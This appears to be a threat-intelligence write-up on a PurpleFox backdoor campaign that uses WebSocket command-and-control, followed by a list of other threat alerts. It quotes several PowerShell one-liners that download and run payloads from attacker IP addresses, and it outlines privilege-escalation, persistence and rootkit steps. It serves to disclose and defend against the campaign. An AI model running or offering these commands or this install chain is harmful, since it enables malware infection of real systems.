PurpleFox Adds New Backdoor That Uses WebSockets

The activity starts with either of the following PowerShell commands being executed:

“cmd.exe” /c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘hxxp[[:]]//103.228.112.246[[:]]17881/57BC9B7E.Png’);MsiMake hxxp[[:]]//103.228.112.246[[:]]17881/0CFA042F.Png”
“cmd.exe” /c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http[:]//117.187.136.141[:]13405/57BC9B7E.Png’);MsiMake http[:]//117.187.136.141[:]13405/0CFA042F.Png”
These commands download a malicious payload from the specified URLs, which are hosted on multiple compromised servers. These servers are part of the PurpleFox botnet, with most of these located in China.
The fetched payload is a long script consisting of three components:

-Tater (Hot Potato – privilege escalation)
-PowerSploit
-Embedded exploit bundle binary (privilege escalation)

The script targets 64-bit architecture systems.
It starts by checking the Windows version and applied hotfixes for the vulnerabilities it is targeting.

Windows 7/Windows Server 2008
CVE-2020-1054 (KB4556836, KB4556843)
CVE-2019-0808 (KB4489878, KB4489885, KB2882822)
Windows 8/Windows Server 2012
CVE-2019-1458 (KB4530702, KB4530730)
Windows 10/Windows Server 2019
CVE-2021-1732 (KB4601354, KB4601345, KB4601315, KB4601319)
After selecting the appropriate vulnerability, it uses the PowerSploit module to reflectively load the embedded exploit bundle binary with the target vulnerability and an MSI command as arguments. As a failover, it uses the Tater module to launch the MSI command.

The goal is to install the MSI package as an admin without any user interaction.

The MSI package starts by removing the following registry keys, which are old Purple Fox installations if any are present:

HKLMSYSTEMCurrentControlSetServices{ac00-ac10}
It then installs the components (dbcode21mk.log and setupact64.log) of the Purple Fox backdoor to Windows directory. Afterward, it sets two registry values under the key “HKLMSYSTEMCurrentControlSetControlSession Manager”:

AllowProtectedRenames to 0x1, and
PendingFileRenameOperations
The MSI package then runs a .vbs script that creates a Windows firewall rule to block incoming connections on ports 135, 139, and 445. As a final step, the system is restarted to allow PendingFileRenameOperations to take place, replacing sens.dll, which will make the malware run as the System Event Notification Service (SENS).

The installed malware is a .dll file protected with VMProtect. Using the other data file installed by the MSI package, it unpacks and manually loads different DLLs for its functionality.
It also has a rootkit driver that is also unpacked from the data file and is used to hide its files, registry keys, and processes. The sample starts by copying itself to another file and installing a new service, then restoring the original sens.dll file.
Afterward, it loads the driver to hide its files and registries and then spawns and injects a sequence of a 32-bit process to inject its code modules into, as they are 32-bit DLLs.
The initial activity for retrieving this backdoor was captured three days after the previous PurpleFox intrusion attempts on the same compromised server.
Analysts flagged the following suspicious PowerShell commands:

“cmd.exe” /c powershell -c “iex((new-object Net.WebClient).DownloadString(‘hxxp[:]//185.112.144.245/a/1’))”
“cmd.exe” /c powershell -c “iex((new-object Net.WebClient).DownloadString(‘hxxp[:]//185.112.144.245/a/2’))”
“cmd.exe” /c powershell -c “iex((new-object Net.WebClient).DownloadString(‘hxxp[:]//185.112.144.245/a/3’))”
“cmd.exe” /c powershell -c “iex((new-object Net.WebClient).DownloadString(‘hxxp[:]//185.112.144.245/a/4’))”
“cmd.exe” /c powershell -c “iex((new-object Net.WebClient).DownloadString(‘hxxp[:]//185.112.144.245/a/5’))”
“cmd.exe” /c powershell -c “iex((new-object Net.WebClient).DownloadString(‘hxxp[:]//185.112.144.245/a/8’))”
“cmd.exe” /c powershell -c “iex((new-object Net.WebClient).DownloadString(‘hxxp[:]//185.112.144.245/a/9’))”

One notable characteristic analysts rarely see in malware is leveraging WebSocket communication to the C&C servers for an efficient bidirectional channel between the infected client and the server.

WebSocket is a communication technology that supports streams of data to be exchanged between a client and a server over just a single TCP session.
This is different from traditional request or response protocols like HTTP. This gives the threat actor a more covert alternative to HTTP requests and responses traffic, which creates an opportunity for a more silent exfiltration with less likelihood of being detected.

The client will verify the signed message by loading the RSA public key loaded from the configuration payload shown in the previous section.
If the signature is verified correctly, key material will be derived from the DH exchange and will be saved as the permanent symmetric AES encryption key (Symmetric_AES_key variable) that will be used as long as the WebSocket channel is active.

Once an efficient encrypted session is established over the WebSocket, the client will fingerprint the machine by extracting specific data (including the username, machine name, local IP, MAC address, and Windows version) and will relay such data over the secure channel to get the victim profiled at the server side, which is the final exchange before the WebSocket channel is fully established.
It will then listen for further commands, which will be covered in the next section.

Sign Up For Threat Alerts

Loading...
Threats Icon

Aug 14, 2022

US Cert Alert – Zeppelin Ransomware

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are...

Threats Icon

Aug 11, 2022

Cisco Talos shares insights related to recent...

Initial access to the Cisco VPN was achieved via the successful compromise of a Cisco...

Threats Icon

Aug 11, 2022

Andariel deploys DTrack and Maui ransomware

The CISA published an alert, entitled, "North Korean State-Sponsored Cyber Actors Use Maui Ransomware To...

Threats Icon

Aug 09, 2022

Albanian Government Organizations Targeted By Possible Iranian...

Mandiant identified the ROADSWEEP ransomware family and a Telegram persona which targeted the Albanian government...

Threats Icon

Aug 08, 2022

BumbleBee Roasts Its Way to Domain Admin

Threat actors used BumbleBee as the initial access vector. BumbleBee is a malware loader that...

Threats Icon

Aug 08, 2022

RapperBot – new evolving malware

FortiGuard Labs has been tracking a rapidly evolving IoT malware family known as "RapperBot". This...

Threats Icon

Aug 04, 2022

Google Drive And Dropbox Used By APT29...

Cloaked Ursa (aka: APT29) has been targeting governmental entities in several countries with spear-phishing campaigns...

Threats Icon

Aug 03, 2022

Manjusaka: A Chinese sibling of Sliver and...

Cisco Talos recently discovered a new attack framework called "Manjusaka" being used in the wild...

Threats Icon

Aug 03, 2022

macOS Targeted With The CloudMensis Multi-Staged Malware

ESET researchers discovered a previously unknown macOS backdoor that spies on users of the compromised...

Threats Icon

Aug 01, 2022

Attackers Target Ukraine With GoMet Backdoor

Since the Russian invasion of Ukraine began, Ukrainians have been under a nearly constant barrage...

Threats Icon

Jul 31, 2022

Untangling KNOTWEED: European private-sector offensive actor using...

The Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC) found a...

Threats Icon

Jul 31, 2022

Untangling KNOTWEED: European private-sector offensive actor using...

The Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC) found a...

Threats Icon

Jul 26, 2022

EvilNum Targets Cryptocurrency, Forex, Commodities

Proofpoint Threat Research observed the group Proofpoint calls TA4563 targeting various European financial and investment...

Threats Icon

Jul 25, 2022

Lightning Framework: New Undetected “Swiss Army Knife”...

Lightning is a previously undocumented and undetected Linux threat. Lightning is a modular framework we...

Threats Icon

Jul 24, 2022

Redeemer Ransomware

Redeemer 2.0 Being Distributed Via Affiliate Program Cyble Research Labs has constantly been tracking emerging...